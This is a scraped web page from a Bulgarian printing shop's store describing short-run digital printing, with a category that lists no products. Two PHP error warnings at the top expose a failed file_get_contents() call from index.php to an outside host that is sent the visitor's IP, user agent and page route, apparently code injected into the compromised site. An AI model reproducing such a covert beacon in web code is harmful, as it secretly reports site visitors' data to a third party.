Warning: file_get_contents() [function.file-get-contents]: Couldn't resolve host name in /home/intel/public_html/index.php on line 24

Warning: file_get_contents(http://pusher.monster?h=intelentrance.com&ip=3.235.137.159&ua=CCBot%2F2.0+%28https%3A%2F%2Fcommoncrawl.org%2Ffaq%2F%29&r=&route=product/category&path=37) [function.file-get-contents]: failed to open stream: operation failed in /home/intel/public_html/index.php on line 24
Дигитален печат
Партньори
 
 
Количка
0 продукта
 
Препоръчани
 

Дигитален печат

ОТПЕЧАТВАНЕ НА ИЗДАНИЯ В МАЛКИ ТИРАЖИ
чрез
ДИГИТАЛЕН ПЕЧАТ

 

    Дейността ни е насочена към клиенти, нуждаещи се от отпечатване в малки тиражи на художествена, справочна или учебна литература, статии, монографии, реклама, брошури или други печатни издания.

   Тиражът може да варира от единични бройки до порядък между 10÷100 или примерно до 300 броя. Това е изключително подходящо за научни монографии, автореферати, стихосбирки, материали за конференции и обучения. Много удачно за бързо тиражиране на печатни материали от 10÷50 копия или повече.

   Цената за печат при такива тиражи се калкулира за точната бройка. В някои случаи това позволява себестойността на единичната бройка при малкия тираж да се изравни с тази при голям - например 1000 бр.

    Съществува зависимост между единичната цена на едно издание и тиража, в който то ще бъде отпечатано. С увеличаване на тиража единичната цена намалява. Не малко автори предпочитат намаляване на тиража с логичното за тях обяснение, че с това ще се намалят и крайните разходи по издаването.

    Твърдението е вярно до известна степен, но ако се погледне от другата страна ще видим, че с намаляване на тиража расте единичната цена на изданието и то стръмно нагоре.

Няма добавени продукти в тази категория.